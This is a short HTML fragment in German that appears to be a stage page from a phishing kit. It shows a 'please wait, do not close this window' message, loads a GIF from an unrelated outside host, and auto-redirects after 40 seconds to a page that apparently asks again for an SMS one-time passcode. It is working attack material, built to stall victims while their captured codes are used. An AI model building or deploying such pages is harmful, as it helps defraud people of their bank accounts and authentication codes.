<link rel="shortcut icon" href="templates/favicon.png">
<meta http-equiv="refresh" content="40; URL=Try-Again-SMS-3.php?cmd=_SMS_OTP_Auth_">
</head>
<title>Bitte warten - Bearbeiten Sie Ihre Anfrage</title>
<link rel="shortcut icon" type="image/x-icon" href="../data/icon/favicon.ico">
<body>

<center><img src="http://atlasflux.saynete.net/image/waitbille.gif">

</div>
<form>
	<div style="font-weight: bolder; font-size:12px;"><h2>* Bitte warten Sie, während wir Ihre Anfrage bearbeiten</h2><h2>* Schließen Sie dieses Fenster nicht</h2>


<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</body></object></html>